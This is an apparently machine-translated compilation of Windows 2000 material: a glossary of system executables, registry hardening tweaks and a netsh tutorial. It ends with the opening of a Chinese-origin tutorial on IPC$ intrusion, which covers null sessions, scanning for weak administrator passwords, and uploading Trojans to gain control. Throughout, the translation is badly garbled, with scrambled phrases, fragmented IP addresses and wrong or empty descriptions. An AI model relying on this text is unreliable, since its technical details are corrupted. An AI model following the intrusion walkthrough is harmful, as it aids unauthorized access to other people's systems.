exe2bin. . Exe> Converts EXE to binary format converted EXE file to binary. .


> Expand expand. .exe Files that have been compressed extract.


extrac32. . Exe> CAB File extraction utility solution CAB tool. .


fastopen。.exe > Fastopen tracks the location of files on a hard disk and stores the information in memory for fast access。. Quick access to the hard disk in memory.


faxcover. . Exe> Fax Cover page editor fax cover editor. .


Faxqueue. .exe > Display Fax Queue displays the fax queue.


faxsend. . Exe> Fax Wizard for sending faxes send fax wizard. .


Faxsvc. fax server Starts .exe > to start the fax service.


fc. . Exe> Compares two files or sets of files and their differences to compare two different files. .


> Searches find. .exe for text string in a file or files to find line of text in the file.


findstr. . Exe> Searches for strings in files Find lines in the file. .


> Fingers finger. .exe and displays a user statistics on that user Finger a user and display the results.


fixmapi. . Exe> Fix mapi files fix MAPI file. .


Flattemp. Enable or disable .exe > temporally directories allow or disable the use of temporary files directory.


fontview. . Exe> Display fonts in a font file shows the font file fonts. .


forcedos。.exe > Forces a file to start in dos mode。. Force the file to run in DOS mode.


freecell. . Exe> Popular Windows Game FreeCell. .


> Ftp File Transfer .exe. Protocol used to transfer files over a network connection is FTP.


gdi. . Exe> Graphic Device Interface GUI-driven. .


grovel。.exe > 。.


grpconv. . Exe> Program Manager Group Convertor conversion program administrators group. .


> Displays help. .exe for Windows 2000 commands help displays help.


hostname. . Exe> Display hostname for machine. . Show machine Hostname. .


Ie4uinit. .exe > Install IE5 User tool IE5 users to install tools.


ieshwiz. . Exe> Customize folder wizard Custom Folder Wizard. .


Iexpress. .exe setup > Create and install packages for wear parts installation package.


iisreset. . Exe> Restart IIS Admin Service restart the IIS service. .


Internat. Language .exe > Keyboard Indicator Applet keyboard language indicator.


ipconfig. . Exe> Windows 2000 IP configuration. . This IP configuration. .


Ipsecmon. .exe > IP Security Monitor IP Security Monitor.


ipxroute. . Exe> IPX Routing and Source Routing Control Program IPX routing and source routing control procedures. .


Irftp. FTP Setup .exe > wireless communication for wireless connection.


ismserv. . Exe> Intersite messaging Service to install or remove the Service Control Manager of the service. .


Jdbgmgr. .exe for java > Microsoft debugger 4 Java4 debugger.


jetconv. . Exe> Convert a Jet Engine Database conversion Jet Engine database. .


jetpack。.exe > Compact Jet Database。. Compressed Jet database.


jview. . Exe> Command-line loader for Java Java command line loader. .


Krnl386. > Core Component for .exe Windows 2000 core components of 2000.


label. . Exe> Change label for drives to change the drive label. .


lcwiz。.exe > License Compliance Wizard for local or remote systems。. License complies with the wizard.


ldifde. . Exe> LDIF cmd line manager LDIF Directory Exchange command line management. .


Licmgr. Terminal Server .exe > License Manager to manage Terminal Services license agreement.


lights. . Exe> display connection status lights show connection status. .


Llsmgr. Windows 2000 .exe > License Manager 2000 license management.


llssrv. . Exe> Start the license Server license server startup. .


lnkstub。.exe > 。.


locator. . Exe> RPC Locator remote positioning. .


Lodctr. perfmon counters > Load .exe call performance counts.


logoff. . Exe> Log current user off. . Cancellation of the user. .


Lpq. status of .exe > Displays a remote LPD queue display remote lpd print queue status display is sent to the server based on Unix printing tasks.


lpr. . Exe> Send a print job to a network printer. . Redirects print jobs to a printer on the network. Commonly used Unix client printer will print jobs sent to NT printing device connected to the printer server. .


Lsass. LSA and Executable .exe > Server DLL running LSA and Server DLL.


lserver. . Exe> Specifies the new DNS domain for the default server to specify a default DNS Server new domain. .


Macfile. .exe > Used for managing MACFILES MACFILES management.


magnify. . Exe> Used to magnify the current screen magnifier. .


Makecab. > MS Cabinet Maker .exe produced CAB file.


mdm. . Exe> Machine Debug Manager Machine Debug Manager. .


Mem. Display current .exe > Memory stats display memory status.


migpwd. . Exe> Migrate passwords. . Migration password. .


Mmc. Microsoft Management Console .exe > console.


mnmsrvc. . Exe> Netmeeting Remote Desktop Sharing NetMeeting Remote Desktop Sharing. .


mobsync。.exe > Manage Synchronization。. Synchronize Directory Manager.


mountvol. . Exe> Creates, deletes, or lists a volume mount point. . To create, delete, or list volume mount point. .


Mplay32. .exe > MS Media Player Media Player.


mpnotify. . Exe> Multiple Provider Notification application to provide more notified applications. .


mq1sync。.exe > 。.


mqbkup. . Exe> MS Message Queue Backup and Restore Utility message queue backup and recovery tools. .


Mqexchng. .exe Setup > Exchange Connector MSMQ message queue Exchange connection settings.


mqmig. . Exe> MSMQ Migration Utility message queue migration tool. .


mqsvc。.exe > ? 。.


mrinfo. . Exe> Multicast routing using SNMP multicast routing using SNMP. .


Mscdexnt. .exe > Installs MSCD (MS CD Extensions) installation MSCD.


msdtc. . Exe> Dynamic Transaction Controller Console dynamic transaction processing console. .


msg。.exe > Send a message to a user local or remote。. Send a message to a local or remote client.


mshta. . Exe> HTML Application HOST HTML application host. .


Msiexec. .exe Installer Starts Windows > start the Windows Installer Program.


mspaint. . Exe> Microsoft Paint drawing board. .


msswchx。.exe > 。.


mstask. . Exe> Task Schedule Program task schedule program. .


Mstinit. > Task scheduler setup .exe..


narrator. . Exe> Program will allow you to have a narrator for reading. . Microsoft Narrator. .


Nbtstat. .exe and protocol stats > Displays current TCP/IP connections using NBT using NBT (NetBIOS over TCP/IP) display protocol statistics and current TCP/IP connections.


nddeapir. . Exe> NDDE API Server side NDDE API server. .


> Net net. .exe Utility to see detailed usage/?.


net1. . Exe> Net Utility updated version from MS Net upgrade version. .


Netdde. .exe > Network DDE will install itself into the background to install its own in the background.


netsh. . Exe> Creates a shell for network information used to configure and monitor Windows 2000 command-line scripting interface. .


netstat。.exe > Displays current connections。. Display protocol statistics and current TCP/IP network connections.


nlsfunc. . Exe> Loads country-specific information for loading a particular country (region) information. Windows 2000 and MS-DOS subsystem do not use this command. Accept the command only for compatibility with MS-DOS file. .


Notepad. Windows 2000 .exe > Notepad Notepad Opens.


nslookup. . Exe> Displays information for DNS of the domain name system from the diagnostic tool shows (DNS) name server information. .


Ntbackup. Opens the .exe > NT Backup Utility-backup and recovery tools.


ntbooks. . Exe> Starts Windows Help Utility Help. .


Ntdsutil. .exe > maintenance of DB Performs the ADSI complete ADSI DB maintenance.


ntfrs. . Exe> NT File Replication Service NT File Replication Service. .


ntfrsupg。.exe > 。.


ntkrnlpa. . Exe> Kernel patch core patch. .


Ntoskrnl. .exe > Core at the heart of the NT Kernel KT..


ntsd. . Exe>. .


Ntvdm. Simulates a .exe > 16-bit Windows environment simulation of 16-bit Windows environment.


nw16. . Exe> Netware Redirector NetWare redirector. .


Nwscript. .exe to run scripts > runs netware Netware script.


odbcad32. . Exe> ODBC 32-bit Administrator 32 位 ODBC management. .


Odbcconf. > Configure ODBC driver .exe ' s and s data source ' from command line command line configuration of the ODBC driver and data source.


os2. . Exe> An OS / 2 Warp Server (os2 / o) OS / 2. .


os2srv。.exe > An OS/2 Warp Server OS/2 。.


os2ss. . Exe> An OS / 2 Warp Server OS / 2. .


Osk. .exe > On Screen Keyboard on-screen keyboard.


packager. . Exe> Windows 2000 Packager Manager Object Packager. .


Pathping. .exe > Combination of Ping and Tracert contains Ping and Tracert procedure.


pax. . Exe> is a POSIX program and path names used as arguments must be specified in POSIX format. . Use "file: / / C / Users / Default" instead of "C: \ USERS \ DEFAULT.." Start the portable archive exchange (Pax) utility. .


pentnt。.exe > Used to check the Pentium for the floating point division error。. Check the Pentium floating point error.


perfmon. . Exe> Starts Windows Performance Monitor Performance Monitor. .


Ping. Packet Internet Groper .exe > verify a connection to a remote computer.


posix. . Exe> Used for backward compatibility with Unix for compatible Unix. .


Print. Cmd .exe > line used to print files to print a text file or display the contents of the print queue.


progman. . Exe> Program manager Program Manager. .


proquota。.exe > Profile quota program 。.


psxss. . Exe> POSIX Subsystem Application Posix subsystem applications. .


qappsrv。.exe > Displays the available application terminal servers on the network 。.


Display terminals in the network server program available. .


Qprocess. Display information about .exe > local or remote processes on local or remote displays process information (Terminal Services).


query. . Exe> Query TERMSERVER user process and sessions inquiry process and dialogue. .


Quser. information about .exe > Display a user logged on to display login information (required Terminal Services).


qwinsta. . Exe> Display information about Terminal Sessions. . Display terminal services. .


Rasadmin. Start the .exe > remote access admin service start remote access service.


rasautou. . Exe> Creates a RAS connection to establish a RAS connection. .


Rasdial. Dial a .exe > connection dial-up connection.


rasphone. . Exe> Starts a RAS connection running RAS connection. .


rcp。.exe > Copies a file from and to a RCP service。. On a Windows 2000-based computer and the remote shell daemon running rshd systems copy the files.


rdpclip. . Exe> RdpClip allows you to copy and paste files between a terminal session and client console session. . And then the terminal and the local copy and paste files. .


Recover. information readable .exe > Recovers from a bad or defective disk from a bad or defective disk recovers readable information.


redir. . Exe> Starts the redirector service runs redirection service. .


Regedt32.32-bit register service .exe > 32-bit register service.


regini. . Exe> modify registry permissions from within a script with the script changes from registration. .


register。.exe > Register a program so it can have special execution characteristics。. Registration contains a special character of the program is running.


regsvc. . Exe>. .


regsvr32。.exe > Registers and unregister’s dll’s。. As to how and where it register’s them I dont know。. Register and the register the DLL.


regtrace. . Exe> Options to tune debug options for applications failing to dump trace statements. .


Trace settings.


regwiz. . Exe> Registration Wizard Registration Wizard. .


remrras。.exe > 。.


replace. . Exe> Replace files in the directory with the source replace the target file the same name files in the directory. .


.Exe > Reset reset. an active active portion of the section to reset.


rexec. . Exe> Runs commands on remote hosts running the REXEC service. . REXEC services running on remote computers run commands. rexec command before the specified command to verify the remote computer's user name, and only installed the TCP / IP protocol before they can use this command. .


risetup。.exe > Starts the Remote Installation Service Wizard。. Run the Remote Setup Wizard service.


route. . Exe> display or edit the current routing tables. . Control network routing table. .


Routemon. > no longer supported .exe is no longer supported!.


router. . Exe> Router software that runs either on a dedicated DOS or on an OS / 2 system. . Route software in DOS or OS / 2 system. .


Rsh. Runs commands > .exe on remote hosts running the RSH service running the RSH service to run commands on a remote computer.


rsm. . Exe> Mounts and configures remote system media media remote system configuration. .


Rsnotify. Remote storage notification .exe > recall remote storage notification echo.


rsvp. . Exe> Resource reservation protocol source reservation protocol. .


Runas. RUN a .exe > program as another user allows the user to specify a different permissions to run the tools and procedures.


rundll32. . Exe> Launches a 32-bit dll program start 32-bit DLL procedures. .


Runonce. > Causes a .exe program to run during startup, and then run the program in the start menu.


rwinsta. . Exe> Reset the session subsystem hardware and software to known initial values to reset the session subsystem hardware and software to the original value. .


Savedump. Does not write .exe > to e:\winnt\user. do not write User .dmp. .dmp.


scardsvr. . Exe> Smart Card resource management server child to card management server. .


schupgr。.exe > It will read the schema update files (。.ldf files) and upgrade the schema。. (Part of ADSI) read plan update files and update the plan.


secedit. . Exe> Starts Security Editor help automated security configuration management. .


Services > Controls all .exe. the services control all services.


sethc. . Exe> Set High Contrast - changes colours and display mode Logoff to set it back to normal settings and high contrast. .


Setreg. Shows the .exe > Software Publishing State Key Values display the software publishing State language.


setup. . Exe> GUI box prompts you to goto control panel to configure system components installation program (go to Control Panel). .


Setver. .exe Files > Set Version for MS-DOS subsystem is set to the version number of MS-DOS program report.


sfc. . Exe> System File Checker test and check system files for integrity System File Checker. .


Sfmprint. > Print Services .exe for Macintosh print Macintosh service.


sfmpsexe. . Exe>. .


sfmsvc。.exe > 。.


shadow. . Exe> Monitor another Terminal Services session. . Monitoring another server with a mid-session. .


> Windows .exe share. 2000 and MS-DOS subsystem do not use this command. Acceptance of the order is only compatible with MS-DOS files.


shmgrate. . Exe>. .


Shrpubw. > Create .exe and Share folders and shared folders.


sigverif. . Exe> File Signature Verification file signature verification. .


Skeys. .exe utility > Serial Keys serial number production tools.


smlogsvc. . Exe> Performance Logs and Alerts Performance Logs and Alerts. .


smss。.exe > 。.


sndrec32. . Exe> starts the Windows Sound Recorder Sound Recorder. .


Sndvol32. Display the .exe > current volume information display sound control information.


snmp. . Exe> Simple Network Management Protocol used for Network Mangement Simple Network Management Protocol. .


Snmptrap. .exe > Utility used with SNMP SNMP tool.


sol. . Exe> Windows Solitaire Game Solitaire. .


Sort. .exe files and Folders > Compares read input, sort the data and the results are written to the screen, files, and other devices.


SPOOLSV. . EXE> Part of the spooler service for printing print pool part of the service. .


sprestrt。.exe > 。.


srvmgr. . Exe> Starts the Windows Server Manager Server Manager. .


stimon。.exe > WDM StillImage- > Monitor 。.


stisvc. . Exe> WDM StillImage-> Service. .


Subst. > Associates a .exe path with a drive letter path with a drive letter.


svchost. . Exe> Svchost. . Exe is a generic host process name for services that are run from dynamic-link libraries (DLLs). . DLL winner process. .


syncapp。.exe > Creates Windows Briefcase。. Create a Windows package.


sysedit. . Exe> Opens Editor for 4 system files System Configuration Editor. .


Syskey. .exe and secure system > Encrypt database NT account database tools according to the group.


sysocmgr. . Exe> Windows 2000 Setup 2000 Setup. .


systray。.exe > Starts the systray in the lower right corner。. In low-privilege to run the systray.


taskman. . Exe> Task Manager Task Manager. .


Taskmgr. Starts the Windows .exe > 2000 Task Manager-task manager.


tcmsetup. . Exe> telephony client wizard to install telephone services to customers. .


Tcpsvcs. TCP Services .exe > TCP services.


exe> Telnet Utility used to connect to Telnet Server. .


> Terminal termsrv. .exe Server Terminal Services.


tftp. . Exe> Trivial FTP to transfer files to the TFTP service is running on remote computers or from the TFTP service is running on remote computers to transfer files. .


tftpd。.exe > Trivial FTP Daemon 。.


themes. . Exe> Change Windows Themes desktop themes. .


Tlntadmn. Telnet Server .exe > Telnet service management Administrator.


tlntsess. . Exe> Display the current Telnet Sessions Display the current Telnet session. .


> Start tlntsvr. .exe the Telnet Server to start the Telnet service.


tracert. . Exe> Trace a route to display paths will be included in the diagnostic utility of different survival time (TTL) value of the Internet Control Message Protocol (ICMP) echo packets sent to the target, to determine the route used to reach goals. .


Tsadmin. Terminal Server Administrator .exe > Terminal Services Manager.


tscon. . Exe> Attaches a user session to a terminal session. . Paste the user session to the terminal dialogue. .


Tsdiscon. > Disconnect a user .exe from a terminal session to disconnect a Terminal Services users.


tskill. . Exe> Kill a Terminal server process kill Terminal Services. .


tsprof。.exe > Used with Terminal Server to query results。. Use Terminal Services concluded that the results of the query.


tsshutdn. . Exe> Shutdown the system shut down the system. .


Unlodctr. Part of .exe > performance monitoring as part of the performance monitor.


upg351db. . Exe> Upgrade a jet database upgrade Jet database. .


UPS > ups. .exe service UPS services.


user. . Exe> Core Windows Service Windows core services. .


Userinit. Part of the .exe > winlogon Winlogon process part of the process.


usrmgr. . Exe> Start the windows user manager for domains Domain User Manager. .


utilman。.exe > This tool enables an administrator to designate which computers automatically open accessibility tools when Windows 2000 starts。. Specifies the start of 2000 opens automatically when the machine.


verifier. . Exe> Driver Verifier Manager Driver Verifier Manager. .


Vwipxspx. .exe > Loads IPX/SPX VDM call IPX/SPX VDM.


w32tm. . Exe> Windows Time Server Time Server. .


Wextract. > Used to extract .exe windows files unzip Windows files.


winchat. . Exe> Opens Windows Chat Windows open chat. .


Winhlp32. Windows .exe > Starts the Help System to run the help system.


winlogon. . Exe> Used as part of the logon process. . Logon part of the process. .


Winmine. windows .exe > Game dug mines.


winmsd. . Exe> Windows Diagnostic utility system information. .


> Wins wins. .exe Service Wins services.


winspool. . Exe> Print Routing Print routing. .


Winver. > Displays the .exe version of Windows display the current Windows version.


wizmgr. . Exe> Starts Windows Administration Wizards Windows Management Wizard. .


Wjview. .exe Command line > Java loader for calling a Java command line.


wowdeb. . Exe>. . For starters, the 32-bit APIs require that the WOWDEB. . EXE task runs in the target debugee's VM starts, the 32-bit API needs. .


Wowexec. .exe For Windows > Windows Applications running over your Windows applications to run on Windows.


wpnpinst. . Exe>?. .


Write. MS Write .exe > Program WordPad Starts.


wscript. . Exe> Windows Scripting Utility scripting tool. .


Wupdmgr. Starts the Windows .exe > update Wizard (Internet) run Windows Upgrade Wizard.


xcopy. . Exe> Used to copy directories to copy files and directories, including subdirectories. .


1. set the time to live.


HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ Tcpip \ Parameters. .


DefaultTTL REG_DWORD 0-0xff (0-255 in decimal, the default value of 128).


Description: Specifies the outgoing IP packets to set the default time to live (TTL) value. TTL determines the IP packet in the network before reaching the target in the maximum time of survival. It actually limits the IP packets discarded by the router to allow the number of former. . Sometimes use this value to detect the remote host operating system. 2, to prevent ICMP redirect attack packets. .


HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters 。.


EnableICMPRedirects REG_DWORD 0 × 0 (default value is 0 × 1). .


Description: this parameter controls whether Windows 2000 will change its routing table in response to a network device (such as a router) sends it by an ICMP redirect message, sometimes being used to do bad things. .Win2000 in the default value is 1, meaning that respond to the ICMP redirect message.


3, prohibits circular route to respond to ICMP packets. .


HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Inter 。.


faces \ interface. .


PerformRouterDiscovery REG_DWORD 0 × 0 (the default value is 0 × 2).


Description: "ICMP routing announcement" feature can cause the computer's network connection to others abnormalities, the data is tapped, the computer was used for flow attack and other serious consequences. . This problem has resulted in some local area large campus network, a long period of network anomalies. Therefore the proposed closure notice to respond to ICMP packet routing. . Win2000 the default value of 2 indicates that when the DHCP sends the router discover option is enabled. .


4. prevent SYN flood attacks.


HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ Tcpip \ Parameters. .


SynAttackProtect REG_DWORD 0 × 2 (the default value is 0 × 0).


Description: SYN attack protection, including reducing the number of SYN-ACK re-transmission, distribution of resources to reduce the retention time. Route cache entry delay the allocation of resources until the connection up. . If synattackprotect = 2, then the connection instructions AFD has been delayed to three-way handshake is completed. . Note that only TcpMaxHalfOpen and TcpMaxHalfOpenRetried set out of range, the protection measures will be taken. .


5, the prohibition of C $, D $, a kind of default share.


HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ lanmanserver \ parameters. .


AutoShareServer、REG_DWORD、0×0 。.


6, against the default ADMIN $ share. .


HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters 。.


AutoShareWks, REG_DWORD, 0 × 0. .


7. restrictions on the IPC $ share by default.


HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Lsa. .


Restrictanonymous REG_DWORD 0 × 0 by default.


0 × 1 anonymous users can not list local user list. .


0 × 2 anonymous users cannot connect to a native IPC $ share.


Note: do not recommend the use of 2, it may cause some of the services you can not start, such as SQL Server. .


8, IGMP Protocol is not supported.


HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ Tcpip \ Parameters. .


IGMPLevel REG_DWORD 0 × 0 (the default value is 0 × 2).


Description: The recall under Win9x has a bug, is to use so that others can use IGMP blue screen, modify the registry to fix this bug. . Win2000 although not this bug, but IGMP is not necessary, therefore, still can be removed. Route print later changed to 0 will not see that annoying 224. .0. .0. .0 Item was. .


9. set the ARP cache aging time settings.


HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services: \ Tcpip \ Parameters. .


ArpCacheLife REG_DWORD 0-0xFFFFFFFF (seconds, the default value is 120 seconds).


ArpCacheMinReferencedLife REG_DWORD 0-0xFFFFFFFF (seconds, default is 600). .


Note: If the ArpCacheMinReferencedLife ArpCacheLife is greater than or equal to, then the reference or does not reference the ARP cache entry expires in ArpCacheLife seconds. If ArpCacheLife is smaller than the ArpCacheMinReferencedLife, does not reference the item expires in ArpCacheLife seconds, and the referenced item in the ArpCacheMinReferencedLife seconds after the maturity date. Each time a station to send packets to the IP address entries, ARP cache will be referenced item. .


10, the prohibition of dead gateway detection technology.


HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services: \ Tcpip \ Parameters. .


EnableDeadGWDetect REG_DWORD 0 × 0 (the default value is ox1).


Note: If you set up multiple gateways, then your machine has difficulty dealing with multiple connections, it will automatically switch to a backup gateway. Sometimes this is not a good idea, proposed to prohibit dead gateway monitoring. .


11, do not support routing functionality.


HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services: \ Tcpip \ Parameters. .


IPEnableRouter REG_DWORD 0 × 0 (the default value is 0 × 0).


Note: the value is set to 0 × 1 with Win2000 routing can thus cause unnecessary problems. .


12, doing NAT external amplification conversion port maximum.


HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services: \ Tcpip \ Parameters. .


MaxUserPort REG_DWORD 5000-65534 (decimal) (the default value of 0 × 1388 – decimal is 5000).


Description: When an application requests from the system when the number of available user port, this parameter controls the maximum port number used. Under normal circumstances, short-term port allocation for the 1024-5000 amount. This parameter is set to the effective outside, they will use the closest valid value (5000 or 65 534). Suggested the value of using NAT to enlarge point. .


13, modify MAC address.


HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Class \. .


Find the right window for the "NIC" directory.


Example is the (4D36E972-E325-11CE-BFC1-08002BE10318). .


Expand it, and under 0000, 0001, 0002 ... Branch found "DriverDesc" key for a description of your network connection, such as "DriverDesc" value is "Intel (R) 82559 Fast Ethernet LAN on Motherboard" and then in the right window of a new string value called "Networkaddress," content as you want, for instance, the MAC value is "004040404040" and then restart your computer, see ipconfig/all . .


Not long ago, we all want to live in the command line instead of the IP and gateway. Previously under implemented in NT4 together too much trouble, now under Windows 2000 the Netsh command to achieve this functionality.


Netsh is a local or remote computer network components of Windows 2000 command line and scripting utility. In order to archive or configure other servers, Netsh utility can also configure the script saved in a text file. .


Netsh utility is a shell that uses additional "Netsh help DLL" can support multiple Windows 2000 components. "Netsh help DLL" to monitor or configure a specific Windows 2000 networking components for other commands, which extends the functionality of Netsh. Each "Netsh help DLL" for the specific network component provides an environment and a set of commands. Each environment can have child environment. For example, in the routing environment, the environment exists in sub-Ip and Ipx, they will IP routing and IPX routing commands together. .


Netsh command-line options include the following:.


Usage: netsh [-a AliasFile] [-c Context] [-r RemoteMachine]. .


[Command | -f ScriptFile]。.


The following command works:. .


This context command:.


? - Display list of commands. .


Aaaa – change to the aaaa context would '.


add - add a configuration item to the project list. .


Delete – deleting a list of configuration items.


dhcp - Changes to `dhcp 'context. .


Dump 0 – displays a configuration script.


exec - run a script file. .


Help – displays a list of commands.


interface - Changes to the `interface 'context. .


Ras – change to the ras ' context would.


routing - change to the `routing 'context. .


Set – updated configuration settings.


show - display information. .


Changes to wins – would wins ' context.


The following sub-contexts are available:. .


routing interface ras dhcp wins aaaa。.


If you need more help with an order, please type the command. .


Followed by?.


-A AliasFile. .


Specifies the use of an alias file. Alias file contains the netsh command list and an alias version, so you can use the alias replaces the netsh command on the command line. You can use the alias file to other platforms in more familiar commands mapped to the appropriate netsh commands.


-C Context. .


Specifies that correspond to installed support dll command environment.


Command. .


Specifies the netsh command to be executed.


-F ScriptFile. .


ScriptFile file specified to run all of the netsh command.


-R RemoteMachine. .


Specifies the remote computer on which to run the netsh command, by name or IP address to specify the remote computer.


You can clear the command abbreviation for the significance of the shortest string. For example, the equivalent command sh ip int release issued show ip interface. Netsh commands can be global or specific environment. Global commands can be issued in any environment, and for general Netsh utility function. Command with the environment, specific environmental change. You can order the release recorded in the log file to create the audit trail netsh command session. .


Lists the netsh global commands.


Command description. .


Move up one level.


? Or help Display command-line "help." .


Show version of the Windows and the Netsh utility's current version.


show netdlls display installed "Netsh Help DLL" in the current version. .


Add Add a Netsh helper DLL "help."


delete helper delete "Netsh Help DLL". .


Show display installed helper "Netsh help DLL.".


cmd to create Windows 2000 command window. .


Online sets the current mode to online.


offline Sets the current mode to offline. .


Set mode sets the current mode to online or offline.


show mode displays the current mode. .


Flush discards in offline mode and any changes made.


commit to submit to offline mode changes. .


Turn on or off the set audit-logging logging tools.


show audit-logging shows the current audit log settings. .


Set loglevel setting the level of logging information.


show loglevel shows the level of recording information. .


Set machine configuration to perform the Netsh command computer.


show machine netsh command shows the implementation of the computer. .


Exec Execute the Netsh command script file.


quit or bye or exit exit Netsh utility. .


Add alias alias to an existing command.


delete alias command to delete the existing alias. .


Show alias displays all defined aliases.


dump will write the text file configuration. .


Popd is popped from the stack environment script commands.


pushd the current environment into the stack of script commands. .


Netsh utility has the following command:.


Online. .


Online mode, at the Netsh command prompt to publish command is executed immediately.


Offline. .


Offline mode, it will accumulate the Netsh command prompt, and publishing of commands by issuing commit global command to execute the batch mode. You can publish the flush global command to discard accumulated commands.


Script. .


Use the-f command line option, or at the Netsh command prompt publishing exec global commands, you can perform the specified file in all of the netsh command.


To create the current configuration of the script, please use the dump global command. dump command netsh command output according to the currently running configuration. You can use this command to create a script to configure the new server or reconfigure existing servers. If you want to configure the components to make great changes, use the dump command is recommended that you start configuring the session to prevent the need to restore the configuration before making changes. .


Interface command.


The following table lists in Windows 2000 command prompt, type the netsh commands used to manage running Windows 2000 Server and "Routing and Remote Access" service interface settings on the computer. If there are multiple commands a particular function, then in between each command with a slash (/) separated. .


When at the command prompt, type the command, click in each command with netsh. To obtain accurate each command syntax, type the following at the command line. Options for example, to obtain the netsh interface command in the command line "help", at the command prompt, type netsh interface?.


Command description. .


Interface set/show interface enabled, disabled, connect, disconnect, and display the configuration for demand-dial interface.


interface set / show credentials in the demand-dial interface to configure or display the user name, password and domain name. .


Closer to home, now let's take a look at the network settings under WIN2000. D:\>netsh 。.


netsh> interface. .


interface>dump 。.


#========================. .


# Interface configuration.


#========================. .


pushd interface。.


reset all. .


popd 。.


# Interface to configure the end. .


# ———————————- 。.


# Interface IP Configuration. .


# ———————————- 。.


pushd interface ip. .


# "Local area connection 2 interface IP configuration.


set address name = "Local Area Connection 2" source = dhcp. .


Set dns name = "local area connection 2" source = dhcp.


set wins name = "Local Area Connection 2" source = dhcp. .


# "Local area connection interface IP configuration".


set address name = "Local Area Connection" source = static addr = 192. .168. .1. .10 Mask = 255. .255. .255. .0. .


Set address name = "local area connection" gateway = 192. .168. .0.1 gwmetric = .1.


set dns name = "Local Area Connection" source = static addr = 192. .168. .0. .1. .


Set wins name = "local area connection" source = static addr = none.


popd. .


# Interface IP configuration is finished.


If you want to quickly modify a local IP address. .


You can use the contents of the text is written to the following:.


interface ip. .


Set static address local connections. 192. .5 .10 .168.255. .255. .255.192. .0 .0 .1 .168.. 1.


^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^. .


Interface name IP address netmask gateway interface metric.


As is saved as local. . Sh. .


D:\>netsh exec local。.sh。.


IPC $ command Xiangjie:. .


Online on ipc $ invasion is an over-abundance of articles, but there are some excellent work, attack steps can even be said has already become a classic mode, so no one is willing to put this has become a set of items with.


That having been said, but I personally think that these articles do not explain the details, first contact ipc $ for a rookie, the simple steps listed, and can not answer many of their confusion (you talk about looking for a hack ipc Forum Search to see how much confusion exists). .


So I wrote this article corresponds to the interpretation of the tutorial. want to get some confused, easily confused people problem clearly, so that we don't always wandering in situ! if you have seen this post still have questions, please send!..


Second, what is ipc $. .


IPC $ (Internet Process Connection) is a shared "named pipes" (you say), which is to enable inter-process communication and open the named pipe, you can verify your user name and password to obtain the appropriate permission, in the remote management computer and view a computer's shared resources when you use.


Use IPC $, who can even connect with the target host to establish the connection without the need for an empty user name and password (of course, the other machine must be opened ipc $ share, or you are not on the connection), while the use of the empty link, connections are also available on the target host user list (although the administrator will be responsible for the ban to export the user list). .


We always say that ipc $ ipc $ loophole loopholes, in fact, ipc $, and is not a real sense of vulnerability, it is for the convenience of the administrator of the remote administration and open the remote network login functionality, but also to open the default share that all logical disk (c $, d $, e $ ...), and winnt or windows system directory (admin $).


All of these, mind and are for the convenience of the administrator's management, but not necessarily a good mind and good results, some people with ulterior motives (in the end what is their intention? I do not know, pronouns 1) will use IPC $, access to shared resources, export user list, and use some dictionary tools for password detection, a higher authority hopes to achieve ulterior motives. .


Interpretation:.


1) IPC Connect is the Windows NT and above systems in remote network access features specific to its function in the equivalent of Unix Telnet, as IPC $ functions need to use Windows NT in a lot of DLL functions, so you can not Windows 9. . X run. .


That is only the nt/2000/xp only ipc $ connection can be established, 98/me is unable to establish connection to the ipc $ (but some friends in Win98 connection cannot be established, empty do not know is true or false, but now in 2003, recommendation 98 comrades, and change the system 98 bad mood).


2) Even the air connection is not 100% able to build a successful, if the other side closed the ipc $ share, you still can not establish a connection. .


3) is not to say that the established ipc $ connection can view each other's user list, because administrators can export the list of users is prohibited.


3 ipc $ connection established role in the hack attack. .


As described above, even if you create a blank connection, you can get a lot of information (and this information is often essential in invasion), the access portion of the share, if you can take one of the privileged user login, then you'll get the appropriate permissions, it is clear that if you login as administrator, 嘿嘿, wouldn't I say now, what u want u can do that!! 。.


(Basically can be summed up as the target information, processes and services, management objectives, upload and run the Trojan, if 2000server, open the Terminal Services can also be considered to facilitate control.. How like? Enough great!). .


But you also do not start, because the Administrator's password is not so good to get in, although there will be some silly administrators use a blank password or mentally retarded password, but this is, after all, not the minority, but now than before, as the people's safety awareness, administrator who has become even more careful, have the administrator password will become more and more difficult: (.


Therefore, you most likely future is to little or no permissions to the permissions to connect, you will slowly find ipc $ connection is not a panacea, even in the host does not open the ipc $ share, you simply can not connect. .


So I think that you don't put the ipc $ invasion as the ultimate weapon, don't think it invincible, which is like a football ball before shooting, very few will have the effect of the fatal blow, but indispensable, I think this is the ipc $ connection in hack intrusion in..


4 ipc $ and air connections, 139,445 ports, the default sharing relationship. .


The four relations may be confused by a rookie, however the majority of articles are no special instructions, in fact, my understanding is not very thorough, are in share summed. (A good discussion atmosphere of BBS can be said to be Rookie of heaven).


1) ipc $ and air connection:. .


Does not require a user name and password of ipc $ connection is empty, once you connect to a user or administrator login (that is, to a specific user name and password for ipc $ connection), nature cannot be called a null connection.


Many people may ask, since you can air connection, then I'll empty connected, why spend tremendous efforts to scan weak passwords, Oh, the reasons mentioned earlier, when you connect to an empty landing When you do not have any permissions (very depressed right), and you the user or administrator login, you will have the appropriate permissions (with rights who do not want to Yeah, they still scan it honestly, do not get lazy yo) . .


2) ipc $ and 139,445 port:.


ipc $ connection can remote login and access the default share; and 139 netbios port open that application of the agreement, we can 139,445 (win2000) port to achieve the shared file / printer access, so generally speaking, ipc $ connection need 139 or 445 ports to support. .


3) ipc $ and default share.


